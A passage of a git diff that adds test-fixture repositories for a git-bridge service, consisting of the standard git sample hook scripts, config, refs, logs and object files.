of commits where the log message starts +# with "WIP" (work in progress). + +remote="$1" +url="$2" + +z40=0000000000000000000000000000000000000000 + +while read local_ref local_sha remote_ref remote_sha +do + if [ "$local_sha" = $z40 ] + then + # Handle delete + : + else + if [ "$remote_sha" = $z40 ] + then + # New branch, examine all commits + range="$local_sha" + else + # Update to existing branch, examine new commits + range="$remote_sha..$local_sha" + fi + + # Check for WIP commit + commit=`git rev-list -n 1 --grep '^WIP' "$range"` + if [ -n "$commit" ] + then + echo >&2 "Found WIP commit in $local_ref, not pushing" + exit 1 + fi + fi +done + +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-rebase.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-rebase.sample new file mode 100755 index 0000000..9773ed4 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/pre-rebase.sample @@ -0,0 +1,169 @@ +#!/bin/sh +# +# Copyright (c) 2006, 2008 Junio C Hamano +# +# The "pre-rebase" hook is run just before "git rebase" starts doing +# its job, and can prevent the command from running by exiting with +# non-zero status. +# +# The hook is called with the following parameters: +# +# $1 -- the upstream the series was forked from. +# $2 -- the branch being rebased (or empty when rebasing the current branch). +# +# This sample shows how to prevent topic branches that are already +# merged to 'next' branch from getting rebased, because allowing it +# would result in rebasing already published history. + +publish=next +basebranch="$1" +if test "$#" = 2 +then + topic="refs/heads/$2" +else + topic=`git symbolic-ref HEAD` || + exit 0 ;# we do not interrupt rebasing detached HEAD +fi + +case "$topic" in +refs/heads/??/*) + ;; +*) + exit 0 ;# we do not interrupt others. + ;; +esac + +# Now we are dealing with a topic branch being rebased +# on top of master. Is it OK to rebase it? + +# Does the topic really exist? +git show-ref -q "$topic" || { + echo >&2 "No such branch $topic" + exit 1 +} + +# Is topic fully merged to master? +not_in_master=`git rev-list --pretty=oneline ^master "$topic"` +if test -z "$not_in_master" +then + echo >&2 "$topic is fully merged to master; better remove it." + exit 1 ;# we could allow it, but there is no point. +fi + +# Is topic ever merged to next? If so you should not be rebasing it. +only_next_1=`git rev-list ^master "^$topic" ${publish} | sort` +only_next_2=`git rev-list ^master ${publish} | sort` +if test "$only_next_1" = "$only_next_2" +then + not_in_topic=`git rev-list "^$topic" master` + if test -z "$not_in_topic" + then + echo >&2 "$topic is already up-to-date with master" + exit 1 ;# we could allow it, but there is no point. + else + exit 0 + fi +else + not_in_next=`git rev-list --pretty=oneline ^${publish} "$topic"` + /usr/bin/perl -e ' + my $topic = $ARGV[0]; + my $msg = "* $topic has commits already merged to public branch:\n"; + my (%not_in_next) = map { + /^([0-9a-f]+) /; + ($1 => 1); + } split(/\n/, $ARGV[1]); + for my $elem (map { + /^([0-9a-f]+) (.*)$/; + [$1 => $2]; + } split(/\n/, $ARGV[2])) { + if (!exists $not_in_next{$elem->[0]}) { + if ($msg) { + print STDERR $msg; + undef $msg; + } + print STDERR " $elem->[1]\n"; + } + } + ' "$topic" "$not_in_next" "$not_in_master" + exit 1 +fi + +exit 0 + +################################################################ + +This sample hook safeguards topic branches that have been +published from being rewound. + +The workflow assumed here is: + + * Once a topic branch forks from "master", "master" is never + merged into it again (either directly or indirectly). + + * Once a topic branch is fully cooked and merged into "master", + it is deleted. If you need to build on top of it to correct + earlier mistakes, a new topic branch is created by forking at + the tip of the "master". This is not strictly necessary, but + it makes it easier to keep your history simple. + + * Whenever you need to test or publish your changes to topic + branches, merge them into "next" branch. + +The script, being an example, hardcodes the publish branch name +to be "next", but it is trivial to make it configurable via +$GIT_DIR/config mechanism. + +With this workflow, you would want to know: + +(1) ... if a topic branch has ever been merged to "next". Young + topic branches can have stupid mistakes you would rather + clean up before publishing, and things that have not been + merged into other branches can be easily rebased without + affecting other people. But once it is published, you would + not want to rewind it. + +(2) ... if a topic branch has been fully merged to "master". + Then you can delete it. More importantly, you should not + build on top of it -- other people may already want to + change things related to the topic as patches against your + "master", so if you need further changes, it is better to + fork the topic (perhaps with the same name) afresh from the + tip of "master". + +Let's look at this example: + + o---o---o---o---o---o---o---o---o---o "next" + / / / / + / a---a---b A / / + / / / / + / / c---c---c---c B / + / / / \ / + / / / b---b C \ / + / / / / \ / + ---o---o---o---o---o---o---o---o---o---o---o "master" + + +A, B and C are topic branches. + + * A has one fix since it was merged up to "next". + + * B has finished. It has been fully merged up to "master" and "next", + and is ready to be deleted. + + * C has not merged to "next" at all. + +We would want to allow C to be rebased, refuse A, and encourage +B to be deleted. + +To compute (1): + + git rev-list ^master ^topic next + git rev-list ^master next + + if these match, topic has not merged in next at all. + +To compute (2): + + git rev-list master..topic + + if this is empty, it is fully merged to "master". diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/prepare-commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/prepare-commit-msg.sample new file mode 100755 index 0000000..f093a02 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/prepare-commit-msg.sample @@ -0,0 +1,36 @@ +#!/bin/sh +# +# An example hook script to prepare the commit log message. +# Called by "git commit" with the name of the file that has the +# commit message, followed by the description of the commit +# message's source. The hook's purpose is to edit the commit +# message file. If the hook fails with a non-zero status, +# the commit is aborted. +# +# To enable this hook, rename this file to "prepare-commit-msg". + +# This hook includes three examples. The first comments out the +# "Conflicts:" part of a merge commit. +# +# The second includes the output of "git diff --name-status -r" +# into the message, just before the "git status" output. It is +# commented because it doesn't cope with --amend or with squashed +# commits. +# +# The third example adds a Signed-off-by line to the message, that can +# still be edited. This is rarely a good idea. + +case "$2,$3" in + merge,) + /usr/bin/perl -i.bak -ne 's/^/# /, s/^# #/#/ if /^Conflicts/ .. /#/; print' "$1" ;; + +# ,|template,) +# /usr/bin/perl -i.bak -pe ' +# print "\n" . `git diff --cached --name-status -r` +# if /^#/ && $first++ == 0' "$1" ;; + + *) ;; +esac + +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/update.sample new file mode 100755 index 0000000..80ba941 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/hooks/update.sample @@ -0,0 +1,128 @@ +#!/bin/sh +# +# An example hook script to block unannotated tags from entering. +# Called by "git receive-pack" with arguments: refname sha1-old sha1-new +# +# To enable this hook, rename this file to "update". +# +# Config +# ------ +# hooks.allowunannotated +# This boolean sets whether unannotated tags will be allowed into the +# repository. By default they won't be. +# hooks.allowdeletetag +# This boolean sets whether deleting tags will be allowed in the +# repository. By default they won't be. +# hooks.allowmodifytag +# This boolean sets whether a tag may be modified after creation. By default +# it won't be. +# hooks.allowdeletebranch +# This boolean sets whether deleting branches will be allowed in the +# repository. By default they won't be. +# hooks.denycreatebranch +# This boolean sets whether remotely creating branches will be denied +# in the repository. By default this is allowed. +# + +# --- Command line +refname="$1" +oldrev="$2" +newrev="$3" + +# --- Safety check +if [ -z "$GIT_DIR" ]; then + echo "Don't run this script from the command line." >&2 + echo " (if you want, you could supply GIT_DIR then run" >&2 + echo " $0 <ref> <oldrev> <newrev>)" >&2 + exit 1 +fi + +if [ -z "$refname" -o -z "$oldrev" -o -z "$newrev" ]; then + echo "usage: $0 <ref> <oldrev> <newrev>" >&2 + exit 1 +fi + +# --- Config +allowunannotated=$(git config --bool hooks.allowunannotated) +allowdeletebranch=$(git config --bool hooks.allowdeletebranch) +denycreatebranch=$(git config --bool hooks.denycreatebranch) +allowdeletetag=$(git config --bool hooks.allowdeletetag) +allowmodifytag=$(git config --bool hooks.allowmodifytag) + +# check for no description +projectdesc=$(sed -e '1q' "$GIT_DIR/description") +case "$projectdesc" in +"Unnamed repository"* | "") + echo "*** Project description file hasn't been set" >&2 + exit 1 + ;; +esac + +# --- Check types +# if $newrev is 0000...0000, it's a commit to delete a ref. +zero="0000000000000000000000000000000000000000" +if [ "$newrev" = "$zero" ]; then + newrev_type=delete +else + newrev_type=$(git cat-file -t $newrev) +fi + +case "$refname","$newrev_type" in + refs/tags/*,commit) + # un-annotated tag + short_refname=${refname##refs/tags/} + if [ "$allowunannotated" != "true" ]; then + echo "*** The un-annotated tag, $short_refname, is not allowed in this repository" >&2 + echo "*** Use 'git tag [ -a | -s ]' for tags you want to propagate." >&2 + exit 1 + fi + ;; + refs/tags/*,delete) + # delete tag + if [ "$allowdeletetag" != "true" ]; then + echo "*** Deleting a tag is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/tags/*,tag) + # annotated tag + if [ "$allowmodifytag" != "true" ] && git rev-parse $refname > /dev/null 2>&1 + then + echo "*** Tag '$refname' already exists." >&2 + echo "*** Modifying a tag is not allowed in this repository." >&2 + exit 1 + fi + ;; + refs/heads/*,commit) + # branch + if [ "$oldrev" = "$zero" -a "$denycreatebranch" = "true" ]; then + echo "*** Creating a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/heads/*,delete) + # delete branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/remotes/*,commit) + # tracking branch + ;; + refs/remotes/*,delete) + # delete tracking branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a tracking branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + *) + # Anything else (is there anything else?) + echo "*** Update hook: unknown type of update to ref $refname of type $newrev_type" >&2 + exit 1 + ;; +esac + +# --- Finished +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/index b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/index new file mode 100644 index 0000000..c9459c6 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/index differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/info/exclude b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/info/exclude new file mode 100644 index 0000000..a5196d1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/info/exclude @@ -0,0 +1,6 @@ +# git ls-files --others --exclude-from=.git/info/exclude +# Lines that start with '#' are comments. +# For a project mostly in C, the following would be a good set of +# exclude patterns (uncomment them if you want to use them): +# *.[oa] +# *~ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/logs/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/logs/HEAD new file mode 100644 index 0000000..87a3c02 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/logs/HEAD @@ -0,0 +1 @@ +0000000000000000000000000000000000000000 e5fc0d2678ec7b9bacf0bf514bac035fa371cb6e Winston Li <git@winston.li> 1471957665 +0100 commit (initial): Main diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/logs/refs/heads/master b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/logs/refs/heads/master new file mode 100644 index 0000000..87a3c02 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/logs/refs/heads/master @@ -0,0 +1 @@ +0000000000000000000000000000000000000000 e5fc0d2678ec7b9bacf0bf514bac035fa371cb6e Winston Li <git@winston.li> 1471957665 +0100 commit (initial): Main diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/objects/8b/6f970d184c1e097e6e6bae9b0eb03fec7796bf b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/objects/8b/6f970d184c1e097e6e6bae9b0eb03fec7796bf new file mode 100644 index 0000000..63b4550 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/objects/8b/6f970d184c1e097e6e6bae9b0eb03fec7796bf differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/objects/e5/fc0d2678ec7b9bacf0bf514bac035fa371cb6e b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/objects/e5/fc0d2678ec7b9bacf0bf514bac035fa371cb6e new file mode 100644 index 0000000..13bccfa --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/objects/e5/fc0d2678ec7b9bacf0bf514bac035fa371cb6e @@ -0,0 +1,2 @@ +xA +1 @Q=E4Zu$pZ#s}AO/yVec 3Hpx@BYx"fJ}g]m\{ pĜRG]ΌdB4& \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/objects/f2/7f21327e2f0f53e9d8afab217fedaeea6a1cee b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/objects/f2/7f21327e2f0f53e9d8afab217fedaeea6a1cee new file mode 100644 index 0000000..d0cc2ae Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/objects/f2/7f21327e2f0f53e9d8afab217fedaeea6a1cee differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/refs/heads/master b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/refs/heads/master new file mode 100644 index 0000000..d9abf31 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj1/DOTgit/refs/heads/master @@ -0,0 +1 @@ +e5fc0d2678ec7b9bacf0bf514bac035fa371cb6e diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/COMMIT_EDITMSG b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/COMMIT_EDITMSG new file mode 100644 index 0000000..c098216 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/COMMIT_EDITMSG @@ -0,0 +1 @@ +Main diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/HEAD new file mode 100644 index 0000000..cb089cd --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/HEAD @@ -0,0 +1 @@ +ref: refs/heads/master diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/config b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/config new file mode 100644 index 0000000..6c9406b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/config @@ -0,0 +1,7 @@ +[core] + repositoryformatversion = 0 + filemode = true + bare = false + logallrefupdates = true + ignorecase = true + precomposeunicode = true diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/description b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/description new file mode 100644 index 0000000..498b267 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/description @@ -0,0 +1 @@ +Unnamed repository; edit this file 'description' to name the repository. diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/applypatch-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/applypatch-msg.sample new file mode 100755 index 0000000..a5d7b84 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/applypatch-msg.sample @@ -0,0 +1,15 @@ +#!/bin/sh +# +# An example hook script to check the commit log message taken by +# applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. The hook is +# allowed to edit the commit message file. +# +# To enable this hook, rename this file to "applypatch-msg". + +. git-sh-setup +commitmsg="$(git rev-parse --git-path hooks/commit-msg)" +test -x "$commitmsg" && exec "$commitmsg" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/commit-msg.sample new file mode 100755 index 0000000..b58d118 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/commit-msg.sample @@ -0,0 +1,24 @@ +#!/bin/sh +# +# An example hook script to check the commit log message. +# Called by "git commit" with one argument, the name of the file +# that has the commit message. The hook should exit with non-zero +# status after issuing an appropriate message if it wants to stop the +# commit. The hook is allowed to edit the commit message file. +# +# To enable this hook, rename this file to "commit-msg". + +# Uncomment the below to add a Signed-off-by line to the message. +# Doing this in a hook is a bad idea in general, but the prepare-commit-msg +# hook is more suited to it. +# +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" + +# This example catches duplicate Signed-off-by lines. + +test "" = "$(grep '^Signed-off-by: ' "$1" | + sort | uniq -c | sed -e '/^[ ]*1[ ]/d')" || { + echo >&2 Duplicate Signed-off-by lines. + exit 1 +} diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/post-update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/post-update.sample new file mode 100755 index 0000000..ec17ec1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/post-update.sample @@ -0,0 +1,8 @@ +#!/bin/sh +# +# An example hook script to prepare a packed repository for use over +# dumb transports. +# +# To enable this hook, rename this file to "post-update". + +exec git update-server-info diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-applypatch.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-applypatch.sample new file mode 100755 index 0000000..4142082 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-applypatch.sample @@ -0,0 +1,14 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed +# by applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-applypatch". + +. git-sh-setup +precommit="$(git rev-parse --git-path hooks/pre-commit)" +test -x "$precommit" && exec "$precommit" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-commit.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-commit.sample new file mode 100755 index 0000000..68d62d5 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-commit.sample @@ -0,0 +1,49 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed. +# Called by "git commit" with no arguments. The hook should +# exit with non-zero status after issuing an appropriate message if +# it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-commit". + +if git rev-parse --verify HEAD >/dev/null 2>&1 +then + against=HEAD +else + # Initial commit: diff against an empty tree object + against=4b825dc642cb6eb9a060e54bf8d69288fbee4904 +fi + +# If you want to allow non-ASCII filenames set this variable to true. +allownonascii=$(git config --bool hooks.allownonascii) + +# Redirect output to stderr. +exec 1>&2 + +# Cross platform projects tend to avoid non-ASCII filenames; prevent +# them from being added to the repository. We exploit the fact that the +# printable range starts at the space character and ends with tilde. +if [ "$allownonascii" != "true" ] && + # Note that the use of brackets around a tr range is ok here, (it's + # even required, for portability to Solaris 10's /usr/bin/tr), since + # the square bracket bytes happen to fall in the designated range. + test $(git diff --cached --name-only --diff-filter=A -z $against | + LC_ALL=C tr -d '[ -~]\0' | wc -c) != 0 +then + cat <<\EOF +Error: Attempt to add a non-ASCII file name. + +This can cause problems if you want to work with people on other platforms. + +To be portable it is advisable to rename the file. + +If you know what you are doing you can disable this check using: + + git config hooks.allownonascii true +EOF + exit 1 +fi + +# If there are whitespace errors, print the offending file names and fail. +exec git diff-index --check --cached $against -- diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-push.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-push.sample new file mode 100755 index 0000000..6187dbf --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-push.sample @@ -0,0 +1,53 @@ +#!/bin/sh + +# An example hook script to verify what is about to be pushed. Called by "git +# push" after it has checked the remote status, but before anything has been +# pushed. If this script exits with a non-zero status nothing will be pushed. +# +# This hook is called with the following parameters: +# +# $1 -- Name of the remote to which the push is being done +# $2 -- URL to which the push is being done +# +# If pushing without using a named remote those arguments will be equal. +# +# Information about the commits which are being pushed is supplied as lines to +# the standard input in the form: +# +# <local ref> <local sha1> <remote ref> <remote sha1> +# +# This sample shows how to prevent push of commits where the log message starts +# with "WIP" (work in progress). + +remote="$1" +url="$2" + +z40=0000000000000000000000000000000000000000 + +while read local_ref local_sha remote_ref remote_sha +do + if [ "$local_sha" = $z40 ] + then + # Handle delete + : + else + if [ "$remote_sha" = $z40 ] + then + # New branch, examine all commits + range="$local_sha" + else + # Update to existing branch, examine new commits + range="$remote_sha..$local_sha" + fi + + # Check for WIP commit + commit=`git rev-list -n 1 --grep '^WIP' "$range"` + if [ -n "$commit" ] + then + echo >&2 "Found WIP commit in $local_ref, not pushing" + exit 1 + fi + fi +done + +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-rebase.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-rebase.sample new file mode 100755 index 0000000..9773ed4 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/pre-rebase.sample @@ -0,0 +1,169 @@ +#!/bin/sh +# +# Copyright (c) 2006, 2008 Junio C Hamano +# +# The "pre-rebase" hook is run just before "git rebase" starts doing +# its job, and can prevent the command from running by exiting with +# non-zero status. +# +# The hook is called with the following parameters: +# +# $1 -- the upstream the series was forked from. +# $2 -- the branch being rebased (or empty when rebasing the current branch). +# +# This sample shows how to prevent topic branches that are already +# merged to 'next' branch from getting rebased, because allowing it +# would result in rebasing already published history. + +publish=next +basebranch="$1" +if test "$#" = 2 +then + topic="refs/heads/$2" +else + topic=`git symbolic-ref HEAD` || + exit 0 ;# we do not interrupt rebasing detached HEAD +fi + +case "$topic" in +refs/heads/??/*) + ;; +*) + exit 0 ;# we do not interrupt others. + ;; +esac + +# Now we are dealing with a topic branch being rebased +# on top of master. Is it OK to rebase it? + +# Does the topic really exist? +git show-ref -q "$topic" || { + echo >&2 "No such branch $topic" + exit 1 +} + +# Is topic fully merged to master? +not_in_master=`git rev-list --pretty=oneline ^master "$topic"` +if test -z "$not_in_master" +then + echo >&2 "$topic is fully merged to master; better remove it." + exit 1 ;# we could allow it, but there is no point. +fi + +# Is topic ever merged to next? If so you should not be rebasing it. +only_next_1=`git rev-list ^master "^$topic" ${publish} | sort` +only_next_2=`git rev-list ^master ${publish} | sort` +if test "$only_next_1" = "$only_next_2" +then + not_in_topic=`git rev-list "^$topic" master` + if test -z "$not_in_topic" + then + echo >&2 "$topic is already up-to-date with master" + exit 1 ;# we could allow it, but there is no point. + else + exit 0 + fi +else + not_in_next=`git rev-list --pretty=oneline ^${publish} "$topic"` + /usr/bin/perl -e ' + my $topic = $ARGV[0]; + my $msg = "* $topic has commits already merged to public branch:\n"; + my (%not_in_next) = map { + /^([0-9a-f]+) /; + ($1 => 1); + } split(/\n/, $ARGV[1]); + for my $elem (map { + /^([0-9a-f]+) (.*)$/; + [$1 => $2]; + } split(/\n/, $ARGV[2])) { + if (!exists $not_in_next{$elem->[0]}) { + if ($msg) { + print STDERR $msg; + undef $msg; + } + print STDERR " $elem->[1]\n"; + } + } + ' "$topic" "$not_in_next" "$not_in_master" + exit 1 +fi + +exit 0 + +################################################################ + +This sample hook safeguards topic branches that have been +published from being rewound. + +The workflow assumed here is: + + * Once a topic branch forks from "master", "master" is never + merged into it again (either directly or indirectly). + + * Once a topic branch is fully cooked and merged into "master", + it is deleted. If you need to build on top of it to correct + earlier mistakes, a new topic branch is created by forking at + the tip of the "master". This is not strictly necessary, but + it makes it easier to keep your history simple. + + * Whenever you need to test or publish your changes to topic + branches, merge them into "next" branch. + +The script, being an example, hardcodes the publish branch name +to be "next", but it is trivial to make it configurable via +$GIT_DIR/config mechanism. + +With this workflow, you would want to know: + +(1) ... if a topic branch has ever been merged to "next". Young + topic branches can have stupid mistakes you would rather + clean up before publishing, and things that have not been + merged into other branches can be easily rebased without + affecting other people. But once it is published, you would + not want to rewind it. + +(2) ... if a topic branch has been fully merged to "master". + Then you can delete it. More importantly, you should not + build on top of it -- other people may already want to + change things related to the topic as patches against your + "master", so if you need further changes, it is better to + fork the topic (perhaps with the same name) afresh from the + tip of "master". + +Let's look at this example: + + o---o---o---o---o---o---o---o---o---o "next" + / / / / + / a---a---b A / / + / / / / + / / c---c---c---c B / + / / / \ / + / / / b---b C \ / + / / / / \ / + ---o---o---o---o---o---o---o---o---o---o---o "master" + + +A, B and C are topic branches. + + * A has one fix since it was merged up to "next". + + * B has finished. It has been fully merged up to "master" and "next", + and is ready to be deleted. + + * C has not merged to "next" at all. + +We would want to allow C to be rebased, refuse A, and encourage +B to be deleted. + +To compute (1): + + git rev-list ^master ^topic next + git rev-list ^master next + + if these 